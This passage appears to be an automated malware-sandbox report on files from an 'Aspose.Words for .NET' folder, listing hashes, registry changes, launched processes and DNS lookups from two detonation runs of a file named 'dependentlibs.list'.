| SHA1 | dddbb19996620ddfd9e9625f4c502356efed2c25 |
| SHA256 | e19006a51b60dcc3e212948ff5531bb7a4c69f832f256de13b84aa646baf8c57 |
| SHA512 | 04ef2d19a5c5c49817ee9214d7eeae513795a440209923009caa6283cc467762837fc2da5ac20c517a7326fde2fffca444b011e5bee089ecf6bb1177b705734c |
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\ScrollNavigator.dll
| MD5 | 868a85db64eb92a821e6928a9e161270 |
| SHA1 | b853cff977b4e5c80463e7c94287332b28e47537 |
| SHA256 | 67be9154c7c4f83d1009b434a8dadb7b64083db602e0dd4fb6f4c0b64eabcd64 |
| SHA512 | 9013976f07ca492fabb69ae276d80d07198f52eccc34a1f7f50e3c6167721f95b2730bdd151133bc626ff1b3de5391a9c9994163153edc8af247b041d77cb95c |
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\aspose.dll
| MD5 | 0f849bc43ffe1bb5f29aac19f11f6740 |
| SHA1 | 2bb74d7772c4b7cae2571e5751914e267b482002 |
| SHA256 | 65eb8d11d173cc5c330a2a87f602e2140c1a73b7cda6eb8c46b88ed2ff093860 |
| SHA512 | 08f168fd42ec9bd83cb6a1f8b580ef50a8aa97db5abd70c1323c090931e29963b1eca350ca9fdebdc5d56b824bc8c11f9b2a1a44f466ea44f5bdb05bf8526675 |
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\et\frame.wav
| MD5 | 88d23c6d9df3fd0481f0fc5f6f371ad1 |
| SHA1 | 4fb6f9aca5c18687d95202d17ece1fbec90f4bad |
| SHA256 | 16da76874a974a58ccd9f8473cce66155237c032567d829d79bb08246b9a71a1 |
| SHA512 | 9eb29d5d64b82be54228149f652fbe4696bb619628f1188a2284c1a5fa3bde41e1b0405162675a275aab9c8d4d0d78c3784204cc11fca3049a3a416723a264b0 |
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\aspose.dll
| MD5 | 0f849bc43ffe1bb5f29aac19f11f6740 |
| SHA1 | 2bb74d7772c4b7cae2571e5751914e267b482002 |
| SHA256 | 65eb8d11d173cc5c330a2a87f602e2140c1a73b7cda6eb8c46b88ed2ff093860 |
| SHA512 | 08f168fd42ec9bd83cb6a1f8b580ef50a8aa97db5abd70c1323c090931e29963b1eca350ca9fdebdc5d56b824bc8c11f9b2a1a44f466ea44f5bdb05bf8526675 |
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\Unrar.dll
| MD5 | 8acc93a5e7f034341465e19ca8153ec9 |
| SHA1 | f4192443c09167756dfe7c887626feeac1407265 |
| SHA256 | 4df7928a91a8fbfd2068f858347eccbf2423d2c61be8ef61e3ae4c3034fb7bb7 |
| SHA512 | e6229abe8c360a58ad5342b1eeb815d57c7645525233bd6a79384dda254e7d3849dd6a345acbdd759bccfbffa41a3de31fafdb682b989e90ad1003035f2f3637 |
C:\Users\Admin\AppData\Local\Aspose.Words for .NET\Unrar.dll
| MD5 | 8acc93a5e7f034341465e19ca8153ec9 |
| SHA1 | f4192443c09167756dfe7c887626feeac1407265 |
| SHA256 | 4df7928a91a8fbfd2068f858347eccbf2423d2c61be8ef61e3ae4c3034fb7bb7 |
| SHA512 | e6229abe8c360a58ad5342b1eeb815d57c7645525233bd6a79384dda254e7d3849dd6a345acbdd759bccfbffa41a3de31fafdb682b989e90ad1003035f2f3637 |
memory/4628-71-0x0000000074F30000-0x0000000074F92000-memory.dmp
memory/4628-72-0x0000000002AB0000-0x0000000002AD0000-memory.dmp
memory/4628-73-0x0000000002AE0000-0x0000000002B43000-memory.dmp
memory/4628-78-0x0000000074F30000-0x0000000074F92000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2023-08-27 22:29
Reported
2023-08-27 22:32
Platform
win7-20230712-en
Max time kernel
117s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\.list\ = "list_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\list_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\.list | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2208 wrote to memory of 2872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2208 wrote to memory of 2872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2208 wrote to memory of 2872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2872 wrote to memory of 2828 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2872 wrote to memory of 2828 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2872 wrote to memory of 2828 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2872 wrote to memory of 2828 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\dependentlibs.list
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\dependentlibs.list
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\dependentlibs.list"
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2023-08-27 22:29
Reported
2023-08-27 22:32
Platform
win10v2004-20230703-en
Max time kernel
142s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4868 wrote to memory of 216 | N/A | C:\Windows\system32\OpenWith.exe | C:\Windows\system32\NOTEPAD.EXE |
| PID 4868 wrote to memory of 216 | N/A | C:\Windows\system32\OpenWith.exe | C:\Windows\system32\NOTEPAD.EXE |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\dependentlibs.list
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\dependentlibs.list
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.128.241.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |